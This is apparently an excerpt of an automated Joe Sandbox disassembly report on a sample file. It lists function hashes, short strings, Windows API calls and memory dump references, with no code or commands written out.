                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974789173-0
                                                                                                                • Opcode ID: c5ba36164e31158411c99a2121a1fe01256b7b14ab0bd49183cddfc5c26af475
                                                                                                                • Instruction ID: 6fb67b8963df39ad7ab972e62aa0b4e1de1b7e7406cd3448c70dd169b171bce9
                                                                                                                • Opcode Fuzzy Hash: c5ba36164e31158411c99a2121a1fe01256b7b14ab0bd49183cddfc5c26af475
                                                                                                                • Instruction Fuzzy Hash: 5EE08636611311BFD7205FB05D0CF9A3BAEEF54792F244828B685DA050DA348445C750
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: %i
                                                                                                                • API String ID: 0-950836615
                                                                                                                • Opcode ID: 91ea99809a94026c8cecb5e910bc1c611c2f579efc0d91b999032a40b07cd7f8
                                                                                                                • Instruction ID: e71b1b1610e07d19ac7cc14be03781cfe7775cbe22044f0fc4712b6edf3fdd89
                                                                                                                • Opcode Fuzzy Hash: 91ea99809a94026c8cecb5e910bc1c611c2f579efc0d91b999032a40b07cd7f8
                                                                                                                • Instruction Fuzzy Hash: 4DB19F758801099ACF2CEF94C8859FFB7B6EF44310F10502AF942A72D1DB749EA6CB95
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __itow_s
                                                                                                                • String ID: xbl$xbl
                                                                                                                • API String ID: 3653519197-1030246648
                                                                                                                • Opcode ID: a8e05920af98bb9eec0709a4aa3d45d79bce33106dfd60b513e00769b50668fd
                                                                                                                • Instruction ID: b03351613ab86f88b4691120ac76b931ff5207815ba76def8d3bc8f769f5eaac
                                                                                                                • Opcode Fuzzy Hash: a8e05920af98bb9eec0709a4aa3d45d79bce33106dfd60b513e00769b50668fd
                                                                                                                • Instruction Fuzzy Hash: 74B15C70A00109AFCB14DF54C891EAEBBBAEF58310F14D559F9499B291EB30E981CB64
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0061FC86: _wcscpy.LIBCMT ref: 0061FCA9
                                                                                                                  • Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
                                                                                                                  • Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC
                                                                                                                • __wcsnicmp.LIBCMT ref: 0066B02D
                                                                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0066B0F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                • String ID: LPT
                                                                                                                • API String ID: 3222508074-1350329615
                                                                                                                • Opcode ID: 12bad4bcfd005e8b3a31847ee4f6f333f75c9b163104993cbcaff634c9b1b692
                                                                                                                • Instruction ID: 2fc8bc0b06e334cf77f101a4be50f1fa863a76e16a3f997e98e98349af194e41
                                                                                                                • Opcode Fuzzy Hash: 12bad4bcfd005e8b3a31847ee4f6f333f75c9b163104993cbcaff634c9b1b692
                                                                                                                • Instruction Fuzzy Hash: 43617D75A00215EFCB18DF94C891EEEB7B6EB09310F108069F916EB391D770AE85CB94
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00612968
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00612981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                • Opcode ID: a6206e4dca1706d55234906acbc814caa728452b09ae4f267d936190ec39b216
                                                                                                                • Instruction ID: e3065e7645aa87ec1f84c47c98a0a5612aca28f64a3f89f1ab1c8e6bd5e14bcf
                                                                                                                • Opcode Fuzzy Hash: a6206e4dca1706d55234906acbc814caa728452b09ae4f267d936190ec39b216
                                                                                                                • Instruction Fuzzy Hash: 3B5146714087449BD360EF14DC86BABBBE9FB85340F41895DF2D8411A2EF709529CB6A
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00604F0B: __fread_nolock.LIBCMT ref: 00604F29
                                                                                                                • _wcscmp.LIBCMT ref: 00669824
                                                                                                                • _wcscmp.LIBCMT ref: 00669837
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                                                • String ID: FILE
                                                                                                                • API String ID: 4029003684-3121273764
                                                                                                                • Opcode ID: afc6870817973a3d0635648e56a21a80a845e26ac3f363192f29c59c70f53a84
                                                                                                                • Instruction ID: 529001159132c59bb819c51372f93e8189ec8d14cfa6fb423b235a6f8945fd81
                                                                                                                • Opcode Fuzzy Hash: afc6870817973a3d0635648e56a21a80a845e26ac3f363192f29c59c70f53a84
                                                                                                                • Instruction Fuzzy Hash: FB419671A4021ABADF259AA4CC45FEFBBBEDF85710F00046DFA04E7181DA71A9058BA5
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID: Ddl$Ddl
                                                                                                                • API String ID: 1473721057-4292462513
                                                                                                                • Opcode ID: 7761c943ec276d6c0f28e59e49b886edf7d6d32b8f3222a9426f45ac6138c6aa
                                                                                                                • Instruction ID: aa3d133a4e4f26229edc09759adec29e71a0fc6bf626ed2f4f30444eab999ff9
                                                                                                                • Opcode Fuzzy Hash: 7761c943ec276d6c0f28e59e49b886edf7d6d32b8f3222a9426f45ac6138c6aa
                                                                                                                • Instruction Fuzzy Hash: FE51D2786443419FD758CF58C580A6ABBF3FB99394F54885DF9858B3A1D331E881CB82
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0067259E
                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006725D4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CrackInternet_memset
                                                                                                                • String ID: |
                                                                                                                • API String ID: 1413715105-2343686810
                                                                                                                • Opcode ID: 5addab64d34a02937c9c5ac4c471809b940a37247abe407be0b0bc96f2208a16
                                                                                                                • Instruction ID: 02ff339087a6669b6755f8ff0343d9e63e1fbd2c1e30907ee5c9eecaf3303055
                                                                                                                • Opcode Fuzzy Hash: 5addab64d34a02937c9c5ac4c471809b940a37247abe407be0b0bc96f2208a16
                                                                                                                • Instruction Fuzzy Hash: 1C312771D0011AABCF55AFA0CC85EEEBBBAFF08340F10405AE919A6162DB315916DB64
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00687B61
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00687B76
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: '
                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                • Opcode ID: 8ed5bd0adf2e25d17fd5a4251d5534aeb3acbded5a7349522d3014fe43a97eec
                                                                                                                • Instruction ID: 17ba11138a760a7aeed7d5dc51910ddde4f7d6f6ddce7144fe40f704a52b29a0
                                                                                                                • Opcode Fuzzy Hash: 8ed5bd0adf2e25d17fd5a4251d5534aeb3acbded5a7349522d3014fe43a97eec
                                                                                                                • Instruction Fuzzy Hash: F041E774A0520A9FDB14DF64C981BEABBB6FB09300F24026AE905AB391D771A951DF90
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00686B17
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00686B53
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$DestroyMove
                                                                                                                • String ID: static
                                                                                                                • API String ID: 2139405536-2160076837
                                                                                                                • Opcode ID: 232df75c5a574c96a3e4b6a926ae8b0b97a0f444c59fd74a2149b4d5a2cb7855
                                                                                                                • Instruction ID: 68b4ec8486ff3cb14972b2ccedb0892ddf7ea02ef28046c9aa1e051dac82e026
                                                                                                                • Opcode Fuzzy Hash: 232df75c5a574c96a3e4b6a926ae8b0b97a0f444c59fd74a2149b4d5a2cb7855
                                                                                                                • Instruction Fuzzy Hash: 4A319E71200604AEDB14AF64CC81FFB73AAFF48764F10961DF9A5D7290DA71AC91C764
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00662911
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0066294C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                • Opcode ID: d0b1e40db4fcddf94c963b340d73a14198cbda682f14f1ee3bb32c4005142f27
                                                                                                                • Instruction ID: cbd49cfb8102c9184a3f3bf9f0d7498915707516ddeda925cc8c7297d00a2844
                                                                                                                • Opcode Fuzzy Hash: d0b1e40db4fcddf94c963b340d73a14198cbda682f14f1ee3bb32c4005142f27
                                                                                                                • Instruction Fuzzy Hash: 5731F731A00707AFEB24CF4ACC55BEEBBB6EF85350F14011DE881A62A1DB709944CB51
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00686761
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0068676C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: Combobox
                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                • Opcode ID: 2564cb94c008c0d9251023f255dd3f9eff0974250980d8cd2ee0aa3f8d85e927
                                                                                                                • Instruction ID: 925a40596e028b47bf1d27eee8e9a1718d3b280286f8f734757b132b9301e1c2
                                                                                                                • Opcode Fuzzy Hash: 2564cb94c008c0d9251023f255dd3f9eff0974250980d8cd2ee0aa3f8d85e927
                                                                                                                • Instruction Fuzzy Hash: 42118275240208AFEF25AF54DC81EFB376BEB49368F114229F91497390D6719C9187A0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00601D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00601D73
                                                                                                                  • Part of subcall function 00601D35: GetStockObject.GDI32(00000011), ref: 00601D87
                                                                                                                  • Part of subcall function 00601D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00601D91
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00686C71
                                                                                                                • GetSysColor.USER32(00000012), ref: 00686C8B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                • String ID: static
                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                • Opcode ID: 51a095f8ed82da08c2751ba0ada37a65c2e71a8510d5ce86d8d247a1e681926b
                                                                                                                • Instruction ID: c47c1f483c02bf186681e9e6a7500d60b59253bd0a4d4de4458ed7200b37959e
                                                                                                                • Opcode Fuzzy Hash: 51a095f8ed82da08c2751ba0ada37a65c2e71a8510d5ce86d8d247a1e681926b
                                                                                                                • Instruction Fuzzy Hash: 88212C72510209AFDF04EFA8CC45EFA7BA9FB08315F005629F955D2250D635E851DB60
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 006869A2
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006869B1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                • Opcode ID: ef8fb4d89741e2456556c01d21b79055d7bdf4ca18bf9ee4372a6818101cca0d
                                                                                                                • Instruction ID: 159fb8a1eae022653634bdb9f0fac69e32f916f974d8e203bfeaca449a496a02
                                                                                                                • Opcode Fuzzy Hash: ef8fb4d89741e2456556c01d21b79055d7bdf4ca18bf9ee4372a6818101cca0d
                                                                                                                • Instruction Fuzzy Hash: 5A118C7150020AABEF10AF64DC45EEB37ABEB05374F605728F9A5972E0C771DC9197A0
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00662A22
                                                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00662A41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                • Opcode ID: 8fcd2d71e8a60eb8739d1e32e2a023d484b517c55eae63916d17d8088a18e146
                                                                                                                • Instruction ID: 3a97dd975212c6ea48c58dec4b06e485d3514c2dd4030bef64f32baffb619c67
                                                                                                                • Opcode Fuzzy Hash: 8fcd2d71e8a60eb8739d1e32e2a023d484b517c55eae63916d17d8088a18e146
                                                                                                                • Instruction Fuzzy Hash: D511D032901926ABCB30DFD8DC54BEA77AAAB45304F045125E895F7390D7B0AD0AC791
                                                                                                                APIs
                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0067222C
                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00672255
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$OpenOption
                                                                                                                • String ID: <local>
                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                • Opcode ID: 4f9524fb02cfba55f723b1a99112ab2d30d0e07a8e114555fe368599c33e0f4d
                                                                                                                • Instruction ID: 784d4d4f981ddd63b3bfe05dd1a8adee45ae9aff29935bb1fe9c0eb16d4f6c25
                                                                                                                • Opcode Fuzzy Hash: 4f9524fb02cfba55f723b1a99112ab2d30d0e07a8e114555fe368599c33e0f4d
                                                                                                                • Instruction Fuzzy Hash: 421106B0541226BADB248F118CA4EF7FBAEFF06351F10C22AF52846101D3709A91D6F0
                                                                                                                APIs
                                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00603C14,006C52F8,?,?,?), ref: 0061096E
                                                                                                                  • Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06
                                                                                                                • _wcscat.LIBCMT ref: 00644CB7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FullNamePath_memmove_wcscat
                                                                                                                • String ID: Sl
                                                                                                                • API String ID: 257928180-832812920
                                                                                                                • Opcode ID: 29b6810a917b4ffd32c77f48ce51977527b8ae7d3391a4eb03c964d5c3d00482
                                                                                                                • Instruction ID: 8b94b310148642123bad0ed35707fc44149a201c59e88e9533b75e2bbda81c60
                                                                                                                • Opcode Fuzzy Hash: 29b6810a917b4ffd32c77f48ce51977527b8ae7d3391a4eb03c964d5c3d00482
                                                                                                                • Instruction Fuzzy Hash: DB11E530900218ABDB80FF60CD12FDE77ABEF08340B0459A9B949D7281EAB0A7C44B14
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                  • Part of subcall function 0065AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0065AABC
                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00658E73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
